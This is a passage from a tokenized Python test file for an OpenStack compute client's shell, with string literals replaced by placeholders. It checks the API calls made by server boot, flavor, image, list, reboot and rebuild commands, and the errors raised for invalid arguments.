assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT:blank>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_bdms_v2_invalid_shutdown_value ( self ) : <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def test_boot_metadata ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> def test_boot_hints ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } , <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : [ '<STR_LIT>' , '<STR_LIT>' ] } , <EOL> } , <EOL> ) <EOL> def test_boot_nics ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . run_command ( cmd ) <EOL> self . 
assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] , <EOL> } , <EOL> } , <EOL> ) <EOL> def test_boot_nics_ipv6 ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . run_command ( cmd ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> ] , <EOL> } , <EOL> } , <EOL> ) <EOL> def test_boot_nics_both_ipv4_and_ipv6 ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_no_value ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_random_key ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_no_netid_or_portid ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_netid_and_portid ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_invalid_ipv4 ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . 
CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_invalid_ipv6 ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_nics_net_id_twice ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> @ mock . patch ( <EOL> '<STR_LIT>' ) <EOL> def test_boot_nics_net_name ( self , mock_networks_list ) : <EOL> mock_networks_list . return_value = ( <NUM_LIT:200> , { } , { <EOL> '<STR_LIT>' : [ { "<STR_LIT:label>" : "<STR_LIT>" , '<STR_LIT:id>' : '<STR_LIT:1>' } ] } ) <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . run_command ( cmd ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT:1>' } , <EOL> ] , <EOL> } , <EOL> } , <EOL> ) <EOL> def test_boot_nics_net_name_not_found ( self ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . ResourceNotFound , self . run_command , cmd ) <EOL> @ mock . patch ( <EOL> '<STR_LIT>' ) <EOL> def test_boot_nics_net_name_multiple_matches ( self , mock_networks_list ) : <EOL> mock_networks_list . return_value = ( <NUM_LIT:200> , { } , { <EOL> '<STR_LIT>' : [ { "<STR_LIT:label>" : "<STR_LIT>" , '<STR_LIT:id>' : '<STR_LIT:1>' } , <EOL> { "<STR_LIT:label>" : "<STR_LIT>" , '<STR_LIT:id>' : '<STR_LIT:2>' } ] } ) <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . NoUniqueMatch , self . run_command , cmd ) <EOL> @ mock . 
patch ( '<STR_LIT>' , return_value = '<STR_LIT>' ) <EOL> def test_boot_nics_net_name_and_net_id ( self , mock_find_network_id ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = '<STR_LIT>' ) <EOL> def test_boot_nics_net_name_and_port_id ( self , mock_find_network_id ) : <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_files ( self ) : <EOL> testfile = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> with open ( testfile ) as testfile_fd : <EOL> data = testfile_fd . read ( ) <EOL> expected = base64 . b64encode ( data . encode ( '<STR_LIT:utf-8>' ) ) . decode ( '<STR_LIT:utf-8>' ) <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . run_command ( cmd % ( testfile , testfile ) ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : [ <EOL> { '<STR_LIT:path>' : '<STR_LIT>' , '<STR_LIT>' : expected } , <EOL> { '<STR_LIT:path>' : '<STR_LIT>' , '<STR_LIT>' : expected } , <EOL> ] <EOL> } } , <EOL> ) <EOL> def test_boot_invalid_files ( self ) : <EOL> invalid_file = os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) <EOL> cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' % invalid_file ) <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_num_instances ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> } ) <EOL> def test_boot_invalid_num_instances ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_num_instances_and_count ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_boot_min_max_count ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . 
assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> } <EOL> } ) <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_boot_with_poll ( self , poll_method ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT:1> , poll_method . call_count ) <EOL> poll_method . assert_has_calls ( <EOL> [ mock . call ( self . shell . cs . servers . get , <NUM_LIT> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] ) ] ) <EOL> def test_boot_with_poll_to_check_VM_state_error ( self ) : <EOL> self . assertRaises ( exceptions . ResourceInErrorState , self . run_command , <EOL> '<STR_LIT>' ) <EOL> def test_boot_named_flavor ( self ) : <EOL> self . run_command ( [ "<STR_LIT>" , "<STR_LIT>" , FAKE_UUID_1 , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:3>" , "<STR_LIT>" ] ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' + FAKE_UUID_1 , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:3> ) <EOL> self . 
assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : FAKE_UUID_1 , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> } , pos = <NUM_LIT:4> ) <EOL> def test_boot_invalid_ephemeral_data_format ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( argparse . ArgumentTypeError , self . run_command , cmd ) <EOL> def test_flavor_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_list_with_extra_specs ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . assert_called_anytime ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_list_with_all ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_list_with_limit_and_marker ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_show_with_alphanum_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called_anytime ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_show_by_name ( self ) : <EOL> self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:3> ) <EOL> def test_flavor_show_by_name_priv ( self ) : <EOL> self . 
run_command ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:3> ) <EOL> def test_flavor_key_set ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_flavor_key_unset ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_flavor_access_list_flavor ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_flavor_access_list_bad_filter ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_flavor_access_list_no_filter ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_flavor_access_list_public ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_flavor_access_add_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_flavor_access_add_by_name ( self ) : <EOL> self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_flavor_access_remove_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_flavor_access_remove_by_name ( self ) : <EOL> self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_image_show ( self ) : <EOL> _ , err = self . run_command ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , err ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_image_meta_set ( self ) : <EOL> _ , err = self . run_command ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , err ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_image_meta_del ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , six . StringIO ( ) ) <EOL> @ mock . patch ( '<STR_LIT>' , six . StringIO ( ) ) <EOL> def test_image_meta_bad_action ( self ) : <EOL> self . assertRaises ( SystemExit , self . run_command , <EOL> '<STR_LIT>' ) <EOL> def test_image_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_create_image ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : { } } } , <EOL> ) <EOL> def test_create_image_with_metadata ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } } , <EOL> ) <EOL> def test_create_image_show ( self ) : <EOL> output , _ = self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . 
assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : { } } } , <EOL> ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create_image_with_poll ( self , poll_method ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . assert_called_anytime ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : { } } } , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT:1> , poll_method . call_count ) <EOL> poll_method . assert_has_calls ( <EOL> [ mock . call ( self . shell . cs . images . get , '<STR_LIT>' , '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] ) ] ) <EOL> def test_create_image_with_poll_to_check_image_state_deleted ( self ) : <EOL> self . assertRaises ( <EOL> exceptions . InstanceInDeletedState , self . run_command , <EOL> '<STR_LIT>' ) <EOL> def test_image_delete ( self ) : <EOL> _ , err = self . run_command ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , err ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_image_delete_multiple ( self ) : <EOL> self . run_command ( '<STR_LIT>' % ( FAKE_UUID_1 , FAKE_UUID_2 ) ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' + FAKE_UUID_1 , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' + FAKE_UUID_1 , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' + FAKE_UUID_2 , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' + FAKE_UUID_2 , pos = <NUM_LIT:3> ) <EOL> def test_list ( self ) : <EOL> self . run_command ( '<STR_LIT:list>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_minimal ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_deleted ( self ) : <EOL> self . 
run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_with_images ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_with_flavors ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_by_tenant ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_list_by_user ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_list_with_single_sort_key_no_dir ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , ( '<STR_LIT>' ) ) <EOL> def test_list_with_single_sort_key_and_dir ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , ( '<STR_LIT>' ) ) <EOL> def test_list_with_sort_keys_no_dir ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def test_list_with_sort_keys_and_dirs ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def test_list_with_sort_keys_and_some_dirs ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def test_list_with_invalid_sort_dir_one ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_list_with_invalid_sort_dir_two ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . 
run_command , cmd ) <EOL> def test_list_sortby_index_with_sort ( self ) : <EOL> for cmd in [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] : <EOL> with mock . patch ( '<STR_LIT>' ) as mock_print_list : <EOL> self . run_command ( cmd ) <EOL> mock_print_list . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , mock . ANY , sortby_index = None ) <EOL> def test_list_sortby_index_without_sort ( self ) : <EOL> for cmd in [ '<STR_LIT:list>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> with mock . patch ( '<STR_LIT>' ) as mock_print_list : <EOL> self . run_command ( cmd ) <EOL> mock_print_list . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , mock . ANY , sortby_index = <NUM_LIT:1> ) <EOL> def test_list_fields ( self ) : <EOL> output , _ = self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> def test_list_invalid_fields ( self ) : <EOL> self . assertRaises ( exceptions . CommandError , <EOL> self . run_command , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def test_list_with_marker ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_with_limit ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_with_changes_since ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_with_changes_since_invalid_value ( self ) : <EOL> self . assertRaises ( exceptions . CommandError , <EOL> self . 
run_command , '<STR_LIT>' ) <EOL> def test_meta_parsing ( self ) : <EOL> meta = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ref = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> parsed_meta = novaclient . v2 . shell . _meta_parsing ( meta ) <EOL> self . assertEqual ( ref , parsed_meta ) <EOL> def test_reboot ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ) <EOL> def test_reboot_many ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , pos = - <NUM_LIT:1> ) <EOL> def test_rebuild ( self ) : <EOL> output , _ = self . run_command ( '<STR_LIT>' % FAKE_UUID_1 ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( 